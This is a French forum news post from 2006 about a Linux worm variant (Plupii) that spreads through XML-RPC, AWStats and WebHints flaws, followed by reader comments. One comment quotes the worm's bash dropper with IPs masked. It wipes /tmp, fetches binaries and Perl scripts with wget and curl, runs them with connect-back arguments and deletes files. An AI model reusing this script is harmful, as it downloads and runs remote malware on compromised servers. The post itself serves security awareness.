Sécurité : Un petit ver pour Linux

Posté par Jean-Christophe Berthon (page perso, ). Modéré le 21 février 2006.

Symantec a découvert [1] ce week-end un nouveau ver destiné aux plate-formes Linux et UNIX. Il s'agit d'une nouvelle variante du virus Plupii découvert en novembre dernier [4].

Ce ver ne représente pas une énorme menace car il n'est que peu répandu. Mais comme il profite de 3 failles de sécurités différentes pour se propager, il faut y faire attention. Les 3 failles concernent (plus de détails dans l'article complet) :
1- XML-RPC for PHP Code Execution Vulnerability
2- AWStats Input Validation Vulnerability
3- WebHints Shell Command Injection Vulnerability

Le ver, une fois le système infecté, va ouvrir une trappe (ou porte dérobée) sur le port UDP 27015.

Des correctifs sont accessibles en ligne :
1- XML-RPC 1.1.1 est couvert [2]
2- AWStats 6.4 est couvert [3]
3- Il n'y aurait pas encore de patch disponible pour Webhints

Mettez à jour vos systèmes, si ce n'est pas déjà fait.

> Lire la dépêche (107 commentaires, moyenne: 3,9).

Vous avez demandé le commentaire #684333.

autres systemes d'exploitation

Posté par David pasmalin (page perso, ) le 21/02/2006 à 13:50. (lien). Évalué à 6.

Une interrogation, vu qu'a ma connaissance tous ces programmes existent sur d'autre plateforme que Linux, n'est il pas etonnant que ce ver soit topé linux ?

[^]Re: autres systemes d'exploitation

Posté par Matthieu MARC () le 21/02/2006 à 14:08. (lien). Évalué à 10.
Parce que dans la série amalgame :

applications open-source = linux
php = linux

tout comme on a :
linux = gratuit

[^]Re: autres systemes d'exploitation

Posté par Christophe Garault (page perso, ) le 21/02/2006 à 14:12. (lien). Évalué à 4.
Tu peux effectivement installer Mambo, Wordpress et autre appli Php sur Windows, mais les scripts que les bots tentent de télécharger puis d'exécuter sont des scripts bash et font appel à des commandes Unix (curl et wget) dont je ne connais pas d'équivalent sous Ouinouin.

Pour info voici un de ces scripts dont j'ai masqué les adresses IP car les sites et les vers téléchargés sont encore présents (enfin plus pour très longtemps amha):

#!/bin/bash
cd /tmp
rm -rf *
mkdir .temp
cd .temp
if [ -f cb ]; then
/bin/chmod +x cb
./cb xxx.xxx.xxx.xxx 8080 &
else
wget xxx.xxx.xxx.xxx/cb
/bin/chmod +x cb
./cb xxx.xxx.xxx.xxx 8080 &
fi
if [ -f https ]; then
perl https
else
wget xxx.xxx.xxx.xxx/https
curl -o https xxx.xxx.xxx.xxx/https
perl https
fi
if [ -f ping.txt ]; then
perl ping.txt xxx.xxx.xxx.xxx 8080 &
else
curl -o ping.txt http://xxx.xxx.xxx.xxx/ping.txt
perl ping.txt xxx.xxx.xxx.xxx 8080 &
fi
if [ -f httpd ]; then
/bin/chmod +x httpd
export PATH="."
httpd
else
wget xxx.xxx.xxx.xxx/httpd
chmod +x httpd
export PATH="."
httpd
fi
if [ -f httpd ]; then
/bin/chmod +x httpd
export PATH="."
httpd
else
curl -o httpd xxx.xxx.xxx.xxx/httpd
/bin/chmod +x httpd
export PATH="."
httpd
fi
/bin/rm -rf /tmp/su*

Mais effectivement on devrait pouvoir en faire aisément un wsh. Enfin moi j'ai autre chose à faire... ;-)
- [^]Re: autres systemes d'exploitation
  
  Posté par David pasmalin (page perso, ) le 21/02/2006 à 14:17. (lien). Évalué à 1.
  a oui pour que ce ver marche il faut vraiment y mettre du sien alors mm
  avoir awstat 6.x x <3 , wget curl bash (perl vient avec awstat) xml rpc et webhint le mec qui a fait ce ver cherchait qq1 je pense mmm
  - [^]Re: autres systemes d'exploitation
    
    Posté par Arachne (page perso, ) le 21/02/2006 à 19:49. (lien). Évalué à 1.
    Il vise tout simplement les serveurs Web, sur lesquels ces softs sont souvent installés.
  [^]Re: autres systemes d'exploitation
  
  Posté par Maxime (Jabber id, ) le 21/02/2006 à 21:26. (lien). Évalué à 1.
  Tiens... Et sur le meme principe, on ne pourrai pas imaginer essayer de sécuriser les ordinateurs ?

Sécurité : Un petit ver pour Linux

autres systemes d'exploitation

[^]Re: autres systemes d'exploitation

[^]Re: autres systemes d'exploitation

[^]Re: autres systemes d'exploitation

[^]Re: autres systemes d'exploitation

[^]Re: autres systemes d'exploitation